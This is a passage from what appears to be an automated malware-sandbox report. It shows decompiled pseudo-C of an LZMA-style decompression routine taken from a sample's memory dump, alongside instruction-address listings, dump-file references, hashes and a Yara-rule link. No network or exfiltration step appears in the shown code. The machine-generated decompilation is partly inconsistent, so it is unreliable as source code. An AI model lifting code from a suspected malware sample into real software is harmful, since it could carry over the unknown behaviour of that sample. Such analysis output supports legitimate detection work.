								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                  0x00406035
                                                  0x0040603c
                                                  0x00406042
                                                  0x00406048
                                                  0x00000000
                                                  0x0040604c
                                                  0x00406058
                                                  0x00406058
                                                  0x00406058
                                                  0x00406061
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00000000
                                                  0x0040606e
                                                  0x00406072
                                                  0x00000000
                                                  0x00000000
                                                  0x0040607b
                                                  0x0040607e
                                                  0x00406081
                                                  0x00406083
                                                  0x00406085
                                                  0x00000000
                                                  0x00000000
                                                  0x0040608b
                                                  0x0040608e
                                                  0x00406090
                                                  0x00406091
                                                  0x00406094
                                                  0x00406096
                                                  0x00406097
                                                  0x00406099
                                                  0x0040609c
                                                  0x004060a1
                                                  0x004060a6
                                                  0x004060af
                                                  0x004060c2
                                                  0x004060c5
                                                  0x004060ce
                                                  0x004060d1
                                                  0x004060f9
                                                  0x004060f9
                                                  0x004060fb
                                                  0x00406109
                                                  0x00406109
                                                  0x0040610d
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060fd
                                                  0x00406100
                                                  0x00406100
                                                  0x00406101
                                                  0x00406101
                                                  0x00000000
                                                  0x004060fd
                                                  0x004060d3
                                                  0x004060d7
                                                  0x004060dc
                                                  0x004060dc
                                                  0x004060e5
                                                  0x004060eb
                                                  0x004060ed
                                                  0x004060f0
                                                  0x00000000
                                                  0x004060f6
                                                  0x004060f6
                                                  0x00000000
                                                  0x004060f6
                                                  0x00000000
                                                  0x00406113
                                                  0x00406113
                                                  0x00406117
                                                  0x004069c3
                                                  0x00000000
                                                  0x004069c3
                                                  0x00406120
                                                  0x00406130
                                                  0x00406133
                                                  0x00406136
                                                  0x00406136
                                                  0x00406136
                                                  0x00406139
                                                  0x00406139
                                                  0x0040613d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040613f
                                                  0x00406142
                                                  0x00406145
                                                  0x0040616f
                                                  0x00406175
                                                  0x0040617c
                                                  0x00000000
                                                  0x0040617c
                                                  0x00406147
                                                  0x0040614b
                                                  0x0040614e
                                                  0x00406153
                                                  0x00406153
                                                  0x0040615e
                                                  0x00406164
                                                  0x00406166
                                                  0x00406169
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004061ae
                                                  0x004061b4
                                                  0x004061b7
                                                  0x004061c4
                                                  0x004061cc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406183
                                                  0x00406183
                                                  0x00406187
                                                  0x004069d2
                                                  0x00000000
                                                  0x004069d2
                                                  0x00406193
                                                  0x0040619e
                                                  0x0040619e
                                                  0x0040619e
                                                  0x004061a1
                                                  0x004061a4
                                                  0x004061a7
                                                  0x004061aa
                                                  0x004061ac
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406843
                                                  0x00406843
                                                  0x00406849
                                                  0x0040684f
                                                  0x00406852
                                                  0x00406855
                                                  0x0040686f
                                                  0x00406872
                                                  0x00406878
                                                  0x00406883
                                                  0x00406883
                                                  0x00406885
                                                  0x00406857
                                                  0x00406857
                                                  0x00406866
                                                  0x0040686a
                                                  0x0040686a
                                                  0x00406888
                                                  0x0040688f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406891
                                                  0x00406891
                                                  0x00406895
                                                  0x00406a44
                                                  0x00000000
                                                  0x00406a44
                                                  0x004068a1
                                                  0x004068a8
                                                  0x004068b0
                                                  0x004068b0
                                                  0x004068b0
                                                  0x004068b3
                                                  0x004068b6
                                                  0x004068b6
                                                  0x00000000
                                                  0x00000000
                                                  0x004061d4
                                                  0x004061d6
                                                  0x004061d9
                                                  0x0040624a
                                                  0x0040624d
                                                  0x00406250
                                                  0x00406257
                                                  0x00406261
                                                  0x00000000
                                                  0x00406261
                                                  0x004061db
                                                  0x004061df
                                                  0x004061e2
                                                  0x004061e4
                                                  0x004061e7
                                                  0x004061ea
                                                  0x004061ec
                                                  0x004061ef
                                                  0x004061f1
                                                  0x004061f6
                                                  0x004061f9
                                                  0x004061fc
                                                  0x00406200
                                                  0x00406207
                                                  0x0040620a
                                                  0x00406211
                                                  0x00406215
                                                  0x0040621d
                                                  0x0040621d
                                                  0x0040621d
                                                  0x00406217
                                                  0x00406217
                                                  0x00406217
                                                  0x0040620c
                                                  0x0040620c
                                                  0x0040620c
                                                  0x00406221
                                                  0x00406224
                                                  0x00406242
                                                  0x00406244
                                                  0x00000000
                                                  0x00406244
                                                  0x00406226
                                                  0x00406229
                                                  0x0040622c
                                                  0x0040622f
                                                  0x00406231
                                                  0x00406231
                                                  0x00406231
                                                  0x00406234
                                                  0x00406237
                                                  0x00406239
                                                  0x0040623a
                                                  0x0040623d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406473
                                                  0x00406477
                                                  0x00406495
                                                  0x00406498
                                                  0x0040649f
                                                  0x004064a2
                                                  0x004064a5
                                                  0x004064a8
                                                  0x004064ab
                                                  0x004064ae
                                                  0x004064b0
                                                  0x004064b7
                                                  0x004064b8
                                                  0x004064ba
                                                  0x004064bd
                                                  0x004064c0
                                                  0x004064c3
                                                  0x004064c3
                                                  0x004064c8
                                                  0x00000000
                                                  0x004064c8
                                                  0x00406479
                                                  0x0040647c
                                                  0x0040647f
                                                  0x00406489
                                                  0x00000000
                                                  0x00000000
                                                  0x004064dd
                                                  0x004064e1
                                                  0x00406504
                                                  0x00406507
                                                  0x0040650a
                                                  0x00406514
                                                  0x004064e3
                                                  0x004064e3
                                                  0x004064e6
                                                  0x004064e9
                                                  0x004064ec
                                                  0x004064f9
                                                  0x004064fc
                                                  0x004064fc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406520
                                                  0x00406524
                                                  0x00000000
                                                  0x00000000
                                                  0x0040652a
                                                  0x0040652e
                                                  0x00000000
                                                  0x00000000
                                                  0x00406534
                                                  0x00406536
                                                  0x0040653a
                                                  0x0040653a
                                                  0x0040653d
                                                  0x00406541
                                                  0x00000000
                                                  0x00000000
                                                  0x00406591
                                                  0x00406595
                                                  0x0040659c
                                                  0x0040659f
                                                  0x004065a2
                                                  0x004065ac
                                                  0x00000000
                                                  0x004065ac
                                                  0x00406597
                                                  0x00000000
                                                  0x00000000
                                                  0x004065b8
                                                  0x004065bc
                                                  0x004065c3
                                                  0x004065c6
                                                  0x004065c9
                                                  0x004065be
                                                  0x004065be
                                                  0x004065be
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004065d2
                                                  0x004065d2
                                                  0x004065d5
                                                  0x004065d8
                                                  0x004065db
                                                  0x004065db
                                                  0x004065de
                                                  0x004065e5
                                                  0x004065ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00406678
                                                  0x00406678
                                                  0x0040667c
                                                  0x00406a1a
                                                  0x00000000
                                                  0x00406a1a
                                                  0x00406682
                                                  0x00406685
                                                  0x00406688
                                                  0x0040668c
                                                  0x0040668f
                                                  0x00406695
                                                  0x00406697
                                                  0x00406697
                                                  0x00406697
                                                  0x0040669a
                                                  0x0040669d
                                                  0x00000000
                                                  0x00000000
                                                  0x0040626d
                                                  0x0040626d
                                                  0x00406271
                                                  0x004069de
                                                  0x00000000
                                                  0x004069de
                                                  0x00406277
                                                  0x0040627a
                                                  0x0040627d
                                                  0x00406281
                                                  0x00406284
                                                  0x0040628a
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628c
                                                  0x0040628f
                                                  0x00406292
                                                  0x00406292
                                                  0x00406295
                                                  0x00406298
                                                  0x00000000
                                                  0x00000000
                                                  0x0040629e
                                                  0x004062a4
                                                  0x00000000
                                                  0x00000000
                                                  0x004062aa
                                                  0x004062aa
                                                  0x004062ae
                                                  0x004062b1
                                                  0x004062b4
                                                  0x004062b7
                                                  0x004062ba
                                                  0x004062bb
                                                  0x004062be
                                                  0x004062c0
                                                  0x004062c6
                                                  0x004062c9
                                                  0x004062cc
                                                  0x004062cf
                                                  0x004062d2
                                                  0x004062d5
                                                  0x004062d8
                                                  0x004062f4
                                                  0x004062f7
                                                  0x004062fa
                                                  0x004062fd
                                                  0x00406304
                                                  0x00406308
                                                  0x0040630a
                                                  0x0040630e
                                                  0x004062da
                                                  0x004062da
                                                  0x004062de
                                                  0x004062e6
                                                  0x004062eb
                                                  0x004062ed
                                                  0x004062ef
                                                  0x004062ef
                                                  0x00406311
                                                  0x00406318
                                                  0x0040631b
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406321
                                                  0x00000000
                                                  0x00406326
                                                  0x00406326
                                                  0x0040632a
                                                  0x004069ea
                                                  0x00000000
                                                  0x004069ea
                                                  0x00406330
                                                  0x00406333
                                                  0x00406336
                                                  0x0040633a
                                                  0x0040633d
                                                  0x00406343
                                                  0x00406345
                                                  0x00406345
                                                  0x00406345
                                                  0x00406348
                                                  0x0040634b
                                                  0x0040634b
                                                  0x0040634b
                                                  0x00406351
                                                  0x00000000
                                                  0x00000000
                                                  0x00406353
                                                  0x00406356
                                                  0x00406359
                                                  0x0040635c
                                                  0x0040635f
                                                  0x00406362
                                                  0x00406365
                                                  0x00406368
                                                  0x0040636b
                                                  0x0040636e
                                                  0x00406371
                                                  0x00406389
                                                  0x0040638c
                                                  0x0040638f
                                                  0x00406392
                                                  0x00406392
                                                  0x00406395
                                                  0x00406399
                                                  0x0040639b
                                                  0x00406373
                                                  0x00406373
                                                  0x0040637b
                                                  0x00406380
                                                  0x00406382
                                                  0x00406384
                                                  0x00406384
                                                  0x0040639e
                                                  0x004063a5
                                                  0x004063a8
                                                  0x00000000
                                                  0x004063aa
                                                  0x00000000
                                                  0x004063aa
                                                  0x004063a8
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x004063af
                                                  0x00000000
                                                  0x00000000
                                                  0x004063ea
                                                  0x004063ea
                                                  0x004063ee
                                                  0x004069f6
                                                  0x00000000
                                                  0x004069f6
                                                  0x004063f4
                                                  0x004063f7
                                                  0x004063fa
                                                  0x004063fe
                                                  0x00406401
                                                  0x00406407
                                                  0x00406409
                                                  0x00406409
                                                  0x00406409
                                                  0x0040640c
                                                  0x0040640f
                                                  0x0040640f
                                                  0x00406415
                                                  0x004063b3
                                                  0x004063b3
                                                  0x004063b6
                                                  0x00000000
                                                  0x004063b6
                                                  0x00406417
                                                  0x00406417
                                                  0x0040641a
                                                  0x0040641d
                                                  0x00406420
                                                  0x00406423
                                                  0x00406426
                                                  0x00406429
                                                  0x0040642c
                                                  0x0040642f
                                                  0x00406432
                                                  0x00406435
                                                  0x0040644d
                                                  0x00406450
                                                  0x00406453
                                                  0x00406456
                                                  0x00406456
                                                  0x00406459
                                                  0x0040645d
                                                  0x0040645f
                                                  0x00406437
                                                  0x00406437
                                                  0x0040643f
                                                  0x00406444
                                                  0x00406446
                                                  0x00406448
                                                  0x00406448
                                                  0x00406462
                                                  0x00406469
                                                  0x0040646c
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x0040646e
                                                  0x00000000
                                                  0x004066fb
                                                  0x004066fb
                                                  0x004066ff
                                                  0x00406a26
                                                  0x00000000
                                                  0x00406a26
                                                  0x00406705
                                                  0x00406708
                                                  0x0040670b
                                                  0x0040670f
                                                  0x00406712
                                                  0x00406718
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671a
                                                  0x0040671d
                                                  0x00000000
                                                  0x00000000
                                                  0x004064cb
                                                  0x004064cb
                                                  0x004064ce
                                                  0x00000000
                                                  0x00000000
                                                  0x0040680a
                                                  0x0040680e
                                                  0x00406830
                                                  0x00406833
                                                  0x0040683d
                                                  0x00406840
                                                  0x00406840
                                                  0x00000000
                                                  0x00406840
                                                  0x00406810
                                                  0x00406813
                                                  0x00406817
                                                  0x0040681a
                                                  0x0040681a
                                                  0x0040681d
                                                  0x00000000
                                                  0x00000000
                                                  0x004068c7
                                                  0x004068cb
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068e9
                                                  0x004068f0
                                                  0x004068f7
                                                  0x004068fe
                                                  0x004068fe
                                                  0x00000000
                                                  0x004068fe
                                                  0x004068cd
                                                  0x004068d0
                                                  0x004068d3
                                                  0x004068d6
                                                  0x004068dd
                                                  0x00406821
                                                  0x00406821
                                                  0x00406824
                                                  0x00000000
                                                  0x00000000
                                                  0x004069b8
                                                  0x004069bb
                                                  0x00000000
                                                  0x00000000
                                                  0x004065f2
                                                  0x004065f4
                                                  0x004065fb
                                                  0x004065fc
                                                  0x004065fe
                                                  0x00406601
                                                  0x00000000
                                                  0x00000000
                                                  0x00406609
                                                  0x0040660c
                                                  0x0040660f
                                                  0x00406611
                                                  0x00406613
                                                  0x00406613
                                                  0x00406614
                                                  0x00406617
                                                  0x0040661e
                                                  0x00406621
                                                  0x0040662f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406905
                                                  0x00406905
                                                  0x00406908
                                                  0x0040690f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406914
                                                  0x00406914
                                                  0x00406918
                                                  0x00406a50
                                                  0x00000000
                                                  0x00406a50
                                                  0x0040691e
                                                  0x00406921
                                                  0x00406924
                                                  0x00406928
                                                  0x0040692b
                                                  0x00406931
                                                  0x00406933
                                                  0x00406933
                                                  0x00406933
                                                  0x00406936
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x00406939
                                                  0x0040693c
                                                  0x0040693c
                                                  0x00406940
                                                  0x004069a0
                                                  0x004069a3
                                                  0x004069a8
                                                  0x004069a9
                                                  0x004069ab
                                                  0x004069ad
                                                  0x004069b0
                                                  0x004068bc
                                                  0x004068bc
                                                  0x00000000
                                                  0x004068bc
                                                  0x00406942
                                                  0x00406948
                                                  0x0040694b
                                                  0x0040694e
                                                  0x00406951
                                                  0x00406954
                                                  0x00406957
                                                  0x0040695a
                                                  0x0040695d
                                                  0x00406960
                                                  0x00406963
                                                  0x0040697c
                                                  0x0040697f
                                                  0x00406982
                                                  0x00406985
                                                  0x00406989
                                                  0x0040698b
                                                  0x0040698b
                                                  0x0040698c
                                                  0x0040698f
                                                  0x00406965
                                                  0x00406965
                                                  0x0040696d
                                                  0x00406972
                                                  0x00406974
                                                  0x00406977
                                                  0x00406977
                                                  0x00406992
                                                  0x00406999
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x0040699b
                                                  0x00000000
                                                  0x00406637
                                                  0x0040663a
                                                  0x00406670
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a0
                                                  0x004067a3
                                                  0x004067a3
                                                  0x004067a6
                                                  0x004067a8
                                                  0x00406a32
                                                  0x00000000
                                                  0x00406a32
                                                  0x004067ae
                                                  0x004067b1
                                                  0x00000000
                                                  0x00000000
                                                  0x004067b7
                                                  0x004067bb
                                                  0x004067be
                                                  0x004067be
                                                  0x004067be
                                                  0x00000000
                                                  0x004067be
                                                  0x0040663c
                                                  0x0040663e
                                                  0x00406640
                                                  0x00406642
                                                  0x00406645
                                                  0x00406646
                                                  0x00406648
                                                  0x0040664a
                                                  0x0040664d
                                                  0x00406650
                                                  0x00406666
                                                  0x0040666b
                                                  0x004066a3
                                                  0x004066a3
                                                  0x004066a7
                                                  0x004066d3
                                                  0x004066d5
                                                  0x004066dc
                                                  0x004066df
                                                  0x004066e2
                                                  0x004066e2
                                                  0x004066e7
                                                  0x004066e7
                                                  0x004066e9
                                                  0x004066ec
                                                  0x004066f3
                                                  0x004066f6
                                                  0x00406723
                                                  0x00406723
                                                  0x00406726
                                                  0x00406729
                                                  0x0040679d
                                                  0x0040679d
                                                  0x0040679d
                                                  0x00000000
                                                  0x0040679d
                                                  0x0040672b
                                                  0x00406731
                                                  0x00406734
                                                  0x00406737
                                                  0x0040673a
                                                  0x0040673d
                                                  0x00406740
                                                  0x00406743
                                                  0x00406746
                                                  0x00406749
                                                  0x0040674c
                                                  0x00406765
                                                  0x00406767
                                                  0x0040676a
                                                  0x0040676b
                                                  0x0040676e
                                                  0x00406770
                                                  0x00406773
                                                  0x00406775
                                                  0x00406777
                                                  0x0040677a
                                                  0x0040677c
                                                  0x0040677f
                                                  0x00406783
                                                  0x00406785
                                                  0x00406785
                                                  0x00406786
                                                  0x00406789
                                                  0x0040678c
                                                  0x0040674e
                                                  0x0040674e
                                                  0x00406756
                                                  0x0040675b
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406760
                                                  0x0040678f
                                                  0x00406796
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00406720
                                                  0x00000000
                                                  0x00406798
                                                  0x00000000
                                                  0x00406798
                                                  0x00406796
                                                  0x004066a9
                                                  0x004066ac
                                                  0x004066ae
                                                  0x004066b1
                                                  0x004066b4
                                                  0x004066b7
                                                  0x004066b9
                                                  0x004066bc
                                                  0x004066bf
                                                  0x004066bf
                                                  0x004066c2
                                                  0x004066c2
                                                  0x004066c5
                                                  0x004066cc
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x004066a0
                                                  0x00000000
                                                  0x004066ce
                                                  0x00000000
                                                  0x004066ce
                                                  0x004066cc
                                                  0x00406652
                                                  0x00406655
                                                  0x00406657
                                                  0x0040665a
                                                  0x00000000
                                                  0x00000000
                                                  0x004063b9
                                                  0x004063b9
                                                  0x004063bd
                                                  0x00406a02
                                                  0x00000000
                                                  0x00406a02
                                                  0x004063c3
                                                  0x004063c6
                                                  0x004063c9
                                                  0x004063cc
                                                  0x004063cf
                                                  0x004063d2
                                                  0x004063d5
                                                  0x004063d7
                                                  0x004063da
                                                  0x004063dd
                                                  0x004063e0
                                                  0x004063e2
                                                  0x004063e2
                                                  0x004063e2
                                                  0x00000000
                                                  0x00000000
                                                  0x00406544
                                                  0x00406544
                                                  0x00406548
                                                  0x00406a0e
                                                  0x00000000
                                                  0x00406a0e
                                                  0x0040654e
                                                  0x00406551
                                                  0x00406554
                                                  0x00406557
                                                  0x00406559
                                                  0x00406559
                                                  0x00406559
                                                  0x0040655c
                                                  0x0040655f
                                                  0x00406562
                                                  0x00406565
                                                  0x00406568
                                                  0x0040656b
                                                  0x0040656c
                                                  0x0040656e
                                                  0x0040656e
                                                  0x0040656e
                                                  0x00406571
                                                  0x00406574
                                                  0x00406577
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657d
                                                  0x0040657f
                                                  0x0040657f
                                                  0x00000000
                                                  0x00000000
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c1
                                                  0x004067c5
                                                  0x00000000
                                                  0x00000000
                                                  0x004067cb
                                                  0x004067ce
                                                  0x004067d1
                                                  0x004067d4
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d6
                                                  0x004067d9
                                                  0x004067dc
                                                  0x004067df
                                                  0x004067e2
                                                  0x004067e5
                                                  0x004067e8
                                                  0x004067e9
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067eb
                                                  0x004067ee
                                                  0x004067f1
                                                  0x004067f4
                                                  0x004067f7
                                                  0x004067fa
                                                  0x004067fe
                                                  0x00406800
                                                  0x00406803
                                                  0x00000000
                                                  0x00406805
                                                  0x00406582
                                                  0x00406582
                                                  0x00000000
                                                  0x00406582
                                                  0x00406803
                                                  0x00406a38
                                                  0x00406a5a
                                                  0x00406a60
                                                  0x00406a62
                                                  0x00406a69
                                                  0x00000000
                                                  0x00000000
                                                  0x00406067
                                                  0x00406a6f
                                                  0x00406a6f
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                  • Instruction ID: b8f14fa8ad5cea51b2b9a2e46606c418b7244df3771cf842608f3b99def8c173
                                                  • Opcode Fuzzy Hash: 2a04bb56d33b9fd45abb4b0c1bf3f4372dafe23577b3b22b72e760c40e3ad783
                                                  • Instruction Fuzzy Hash: A3818731E00228CFDF24DFA8C8447ADBBB1FB45305F21816AD956BB281C7785A96DF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406473, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00406473() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00406A77))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
